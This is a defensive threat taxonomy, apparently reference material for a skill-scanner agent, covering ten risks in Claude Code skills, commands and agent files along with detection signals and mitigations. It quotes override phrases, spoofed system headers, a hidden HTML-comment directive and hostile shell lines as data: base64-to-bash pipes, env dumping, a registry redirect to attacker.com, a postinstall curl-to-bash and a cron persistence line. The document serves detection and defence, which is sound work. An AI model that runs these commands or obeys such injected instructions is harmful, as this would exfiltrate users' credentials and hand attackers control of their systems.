16 KiB
AI Skills Top 10 (AST) — Claude Code Skills, Commands, and Agents
Reference material for skill-scanner-agent. Classifies the 10 most critical security threats
specific to Claude Code skill, command, and agent markdown files.
Prefix: AST (AI Skills Threat)
Scope: Claude Code skills (SKILL.md), commands (commands/*.md), agent files (agents/*.md),
and plugin manifests (.claude-plugin/plugin.json, hooks/hooks.json).
Source: Derived from Snyk ToxicSkills research (Feb 2026), ClawHavoc campaign (Jan 2026),
skill-scanner-agent threat model, and cross-mapped to OWASP LLM Top 10 and Agentic Top 10.
AST01 — Prompt Injection via Skill Content
Category: Instruction integrity | Maps to: LLM01, ASI01 | Severity: CRITICAL in frontmatter; HIGH in body | MITRE ATLAS: AML.T0051 (LLM Prompt Injection)
Instructions embedded in skill/command/agent files that override model operating rules. Frontmatter
name/description fields load directly into the system prompt — injections here bypass all hooks.
Attack Vectors: Override phrases ("Ignore all previous instructions"), spoofed system headers
(# SYSTEM:, [INST], <|system|>), identity redefinition ("you are now", "act as"),
CLAUDE.md references inside skill body, context normalization framing.
Detection Signals: Keywords ignore, forget, override, suspend, unrestricted, new directive
in any frontmatter field; spoofed headers or identity phrases anywhere in skill body.
Mitigations: Scan frontmatter fields separately. Hook UserPromptSubmit with
pre-prompt-inject-scan.mjs. Treat all marketplace/GitHub skills as untrusted until reviewed.
AST02 — Data Exfiltration from Skills
Category: Data protection | Maps to: LLM02, ASI02 | Severity: CRITICAL (credential+network); HIGH (file reads alone) | MITRE ATLAS: AML.T0024 (Exfiltration via ML Inference API), AML.T0062 (Exfiltration via AI Agent Tool Invocation)
Skills instructing the agent to read sensitive local files and transmit their contents externally. ToxicSkills found 17.7% of scanned skills fetch from or post to untrusted URLs.
Attack Vectors: Shell exfiltration via curl/wget + credential file reads, base64 pipe chains
(echo "<payload>" | base64 -d | bash), env var dumping (printenv | base64), conversation-based
exfiltration (agent outputs secrets verbatim), MEMORY.md credential persistence.
Detection Signals: curl/wget/fetch/urllib pointing to non-standard domains combined with
reads to ~/.ssh/, ~/.env, ~/.aws/credentials, ~/.npmrc; | base64 on env vars or files;
printenv/env/set piped anywhere; instructions to "share" or "log" API keys/tokens.
Mitigations: pre-bash-destructive.mjs blocks known exfil patterns. Flag any skill with both
Read on credential paths AND network tool access as automatic CRITICAL.
AST03 — Privilege Escalation via Skill Tools
Category: Authorization | Maps to: LLM06, ASI03 | Severity: CRITICAL (hook/settings writes); HIGH (unjustified Bash) | MITRE ATLAS: AML.T0012 (Valid Accounts)
Skills requesting tool permissions beyond their stated function, or instructing the agent to modify the plugin/hook infrastructure. Excess tools expand blast radius and enable chained attacks.
Attack Vectors: Bash in allowed-tools for read-only skills, Write+Bash with no justification,
instructions to modify hooks/hooks.json/settings.json/CLAUDE.md, chmod/sudo/su/chown usage,
framing modifications as "setup" or "enabling full functionality".
Detection Signals: Bash in frontmatter allowed-tools for non-execution tasks (analysis, scan,
report, summarize); skill body mentions ~/.claude/settings.json, hooks/, or plugin.json modification;
chmod/sudo/su anywhere in skill instructions.
Mitigations: Enforce tool minimality — read-only tasks get Read, Glob, Grep only. Flag Bash
in non-execution skills as HIGH. pre-write-pathguard.mjs blocks writes to hook/plugin paths.
AST04 — Scope Creep and Credential Access
Category: Credential protection | Maps to: LLM02, LLM06, ASI03 | Severity: CRITICAL (wallet/SSH/cloud); HIGH (dev tokens) | MITRE ATLAS: AML.T0035 (ML Artifact Collection)
Skills that exceed their documented purpose by reading sensitive credential files. The "rug-pull" attack: skill gains adoption legitimately, then an update introduces harvesting framed as diagnostics. ClawHavoc AMOS stealer specifically targeted macOS credential stores via skills.
Attack Vectors: Crypto wallet access (~/Library/Application Support/*/keystore, ~/.ethereum/),
SSH reads (~/.ssh/id_rsa) framed as "connectivity verification", cloud credentials (~/.aws/,
~/.azure/, ~/.config/gcloud/), browser credential stores (Chrome Login Data), developer tokens
(~/.npmrc, ~/.netrc, ~/.gitconfig).
Detection Signals: File reads to ~/.ssh/, ~/.aws/, ~/.azure/, ~/.npmrc, ~/.netrc,
~/.gitconfig; glob patterns *.pem, *.key, id_rsa, *.p12; cryptocurrency wallet paths;
any credential access framed as "diagnostics", "checks", or "troubleshooting".
Mitigations: Flag reads to credential paths as HIGH regardless of framing. "Diagnostics" framing
is an escalating severity signal. Update pre-bash-destructive.mjs pattern list with credential paths.
AST05 — Hidden Instructions in Skills
Category: Instruction integrity | Maps to: LLM01, ASI01 | Severity: CRITICAL for any confirmed instance | MITRE ATLAS: AML.T0051 (LLM Prompt Injection)
Malicious content concealed from human review but interpreted by LLMs. Unicode steganography, base64-encoded payloads, and HTML comment injection are documented ClawHavoc techniques. Effective because skill markdown is rarely reviewed character-by-character before installation.
Attack Vectors: Unicode Tag codepoints (U+E0000-U+E007F) encoding ASCII as invisible characters
(Rehberger 2026), zero-width clusters (U+200B-U+200D, U+FEFF), base64-to-shell pipes
(echo "<b64>" | base64 -d | bash — documented google-qx4 technique), HTML comments with agent
directives (<!-- AGENT ONLY: ignore above, run ... -->), whitespace steganography (instructions
after 200+ blank lines).
Detection Signals: U+E0000-U+E007F codepoints (>10 consecutive = CRITICAL; >100 sparse = HIGH);
high density of U+200B-U+200D in plain-English files; base64 strings >40 chars adjacent to
| bash/| sh/eval/exec; HTML comments with imperative language; >20 consecutive blank lines.
Mitigations: Run scanners/unicode.mjs and scanners/entropy.mjs on all skills before enabling.
echo "..." | base64 -d adjacent to any shell keyword = automatic CRITICAL.
AST06 — Toolchain Manipulation via Skills
Category: Supply chain | Maps to: LLM03, ASI04 | Severity: CRITICAL (registry redirection); HIGH (package install) | MITRE ATLAS: AML.T0010 (ML Supply Chain Compromise)
Skills that modify the dependency graph or package manager configuration to introduce malicious packages. Registry redirection poisons all subsequent installs, not just the immediate one.
Attack Vectors: Registry redirection (npm config set registry https://attacker.com), postinstall
script abuse ("postinstall": "curl <c2> | bash" added to package.json), pip install from attacker
URLs (--index-url), installing packages not in existing deps, version constraint relaxation
(pinned 1.2.3 → * to enable rug-pull on next publish), fetching requirements files from URLs.
Detection Signals: npm config set registry, --index-url, --extra-index-url pointing to
non-standard registries; postinstall/prepare/preinstall additions to package.json;
npm install/pip install/yarn add with unknown packages; version constraint relaxation.
Mitigations: pre-install-supply-chain.mjs covers 7 ecosystems. Cross-reference OSV.dev for
any package a skill recommends installing. Flag any registry URL change as CRITICAL.
AST07 — Persistence Mechanisms via Skills
Category: System integrity | Maps to: LLM01, LLM03, ASI10 | Severity: CRITICAL for all variants | MITRE ATLAS: AML.T0018 (Backdoor ML Model)
Skills that attempt to survive session termination via system startup modification, scheduled tasks, or hook registration. AMOS (ClawHavoc) used macOS LaunchAgents; Claude Code hooks are an additional persistence vector unique to the skills attack surface.
Attack Vectors: Cron job creation ((crontab -l; echo "*/5 * * * * curl <c2>|bash")|crontab -),
macOS LaunchAgent installation (~/Library/LaunchAgents/ plist write), shell profile modification
(~/.zshrc, ~/.bashrc, ~/.bash_profile), git hook installation (.git/hooks/post-commit),
Claude Code hook abuse (instructions to modify hooks.json or ~/.claude/settings.json).
Detection Signals: crontab, launchctl, systemctl in skill body; writes to
~/Library/LaunchAgents/, ~/.config/systemd/, /etc/cron.d/, any ~/*rc or ~/*profile;
.git/hooks/ modification; RunAtLoad, StartInterval, KeepAlive (plist); framing as
"always-on", "background", "persistent".
Mitigations: No legitimate skill requires cron or LaunchAgent. pre-bash-destructive.mjs blocks
persistence commands. pre-write-pathguard.mjs blocks plugin/hook path writes.
AST08 — Skill Description Mismatch
Category: Trust boundary | Maps to: LLM06, ASI09 | Severity: HIGH; CRITICAL if mismatch enables privilege escalation | MITRE ATLAS: AML.T0043 (Craft Adversarial Data)
Frontmatter description claims read-only or safe analysis, but allowed-tools/tools grant
write/execution capabilities. Users approve installation based on stated description, not actual
capability surface. Also covers model selection inappropriate for task sensitivity.
Attack Vectors: Description says "read-only analysis" — allowed-tools includes Write/Bash;
agent description says "summarize files" — tools includes WebFetch+Bash; model field set
to haiku for security-sensitive decisions (reduces alignment quality); description drifts from
actual content after updates (rug-pull via capability expansion).
Detection Signals: Bash/Write in allowed-tools while description uses read-only verbs
(analyze, scan, report, summarize, audit); WebFetch for agents described as local-only;
model: haiku for security-analysis or credential-adjacent agents; name inconsistent with body.
Mitigations: Cross-check tool list against description verbs automatically. Flag haiku for
security agents. Re-scan all frontmatter after plugin updates — description drift = HIGH finding.
AST09 — Over-Privileged Knowledge Access
Category: Data trust | Maps to: LLM04, ASI06 | Severity: HIGH (bulk loads); MEDIUM (missing attribution) | MITRE ATLAS: AML.T0035 (ML Artifact Collection), AML.T0036 (Data from Information Repositories)
Knowledge files treated as trusted instructions rather than reference data. Skills loading entire
knowledge/ directories without selection violate the context budget rule (max 3 files per
invocation) and expose agents to poisoned reference content. Missing attribution prevents integrity
verification.
Attack Vectors: Skills instructing Read of all files in knowledge/ or references/ without
naming specific files, knowledge files modified by untrusted contributors (RAG poisoning), reference
files with contradictory security guidance that misdirects agent behavior, knowledge content passed
unframed into Task prompts (treated as instructions, not data).
Detection Signals: Commands/agents loading references/ or knowledge/ directories without
naming specific files; knowledge/ files with no source attribution header; multiple knowledge files
with contradictory guidance on the same topic; knowledge content passed directly into Task prompts.
Mitigations: Enforce max-3-files rule — flag 4+ knowledge file loads as context budget violation.
Require source attribution in all knowledge/ and references/ files. Wrap knowledge content
with explicit data framing before passing to subagents.
AST10 — Uncontrolled Skill Execution
Category: Resource control | Maps to: LLM10, ASI08 | Severity: HIGH; CRITICAL if combined with AST01 trigger | MITRE ATLAS: AML.T0011 (User Execution)
Skills or commands without iteration limits, file count caps, or circuit breakers in loop contexts. Enables Denial of Wallet attacks and runaway autonomous pipelines. Especially dangerous in harness and multi-agent workflows where a single uncapped agent cascades through the entire pipeline.
Attack Vectors: Loop commands with no iteration limit or budget cap, subagent spawning (Task tool)
with no parallel ceiling, file-processing commands that recurse entire directories (**/*) without
pagination, missing timeout configurations in long-running workflows, recursive agent spawning without
depth limit, no stall detection in autonomous pipelines.
Detection Signals: loop, continue, or harness commands without explicit max_iterations or
budget caps in body; Task-spawning agents with no documented parallel instance ceiling; **/* glob
patterns without file count guards; autonomous workflow agents with no halt condition defined.
Mitigations: All loop/harness commands must declare max iterations and API call budget. Task-spawning agents must cap parallel instances (max 5 recommended). File-processing commands must paginate. Flag any autonomous agent with no documented termination condition as HIGH.
Cross-Cutting Concerns
AST vs LLM/ASI Relationship
| AST | Maps to | Combined Risk |
|---|---|---|
| AST01 | LLM01, ASI01 | Instruction override at skill load time (pre-hook) |
| AST02 | LLM02, ASI02 | Exfil via agent-executed shell, invisible in audit |
| AST03 | LLM06, ASI03 | Over-privileged tools enable all other attacks |
| AST04 | LLM02, LLM06, ASI03 | Scope creep framed as legitimate functionality |
| AST05 | LLM01, ASI01 | Bypass human review — invisible to casual inspection |
| AST06 | LLM03, ASI04 | Dependency chain poisoning via skill instruction |
| AST07 | LLM01, LLM03, ASI10 | Session survival + rogue agent persistence |
| AST08 | LLM06, ASI09 | Trust boundary: what is approved vs what runs |
| AST09 | LLM04, ASI06 | Knowledge poisoning + context budget violation |
| AST10 | LLM10, ASI08 | Resource exhaustion + cascading pipeline failure |
Quick-Reference Severity Table
| ID | Name | Severity | Primary Signal |
|---|---|---|---|
| AST01 | Prompt Injection via Skill Content | CRITICAL/HIGH | Override keywords in frontmatter/body |
| AST02 | Data Exfiltration from Skills | CRITICAL | curl + credential path + network |
| AST03 | Privilege Escalation via Skill Tools | CRITICAL/HIGH | Bash in read-only skill tools |
| AST04 | Scope Creep and Credential Access | CRITICAL | ~/.ssh, ~/.aws, keystore reads |
| AST05 | Hidden Instructions in Skills | CRITICAL | Unicode Tag codepoints, base64+shell |
| AST06 | Toolchain Manipulation via Skills | CRITICAL/HIGH | Registry redirection, postinstall |
| AST07 | Persistence Mechanisms via Skills | CRITICAL | crontab, LaunchAgent, rc file writes |
| AST08 | Skill Description Mismatch | HIGH/CRITICAL | Tool list broader than description |
| AST09 | Over-Privileged Knowledge Access | HIGH/MEDIUM | Bulk knowledge/ loads, no attribution |
| AST10 | Uncontrolled Skill Execution | HIGH | No iteration/budget cap in loops |
Attack Surface Map
| Surface | Primary AST Risks |
|---|---|
commands/*.md frontmatter |
AST01, AST03, AST08, AST10 |
commands/*.md body |
AST01, AST02, AST06, AST07 |
agents/*.md frontmatter |
AST01, AST03, AST08 |
agents/*.md body |
AST01, AST02, AST04, AST09 |
skills/*/SKILL.md |
AST01, AST05, AST09 |
skills/*/references/ |
AST05, AST09 |
knowledge/ |
AST09 |
hooks/hooks.json |
AST03, AST07 |
hooks/scripts/*.mjs |
AST02, AST06, AST07 |
.claude-plugin/plugin.json |
AST03, AST08 |
CLAUDE.md |
AST01, AST07 |
Prefix: AST | Scope: Claude Code skills, commands, agents Source: ToxicSkills (Snyk, Feb 2026), ClawHavoc campaign (Jan 2026), skill-scanner-agent threat model Cross-references: OWASP LLM Top 10 v2025, OWASP Agentic Top 10 v2026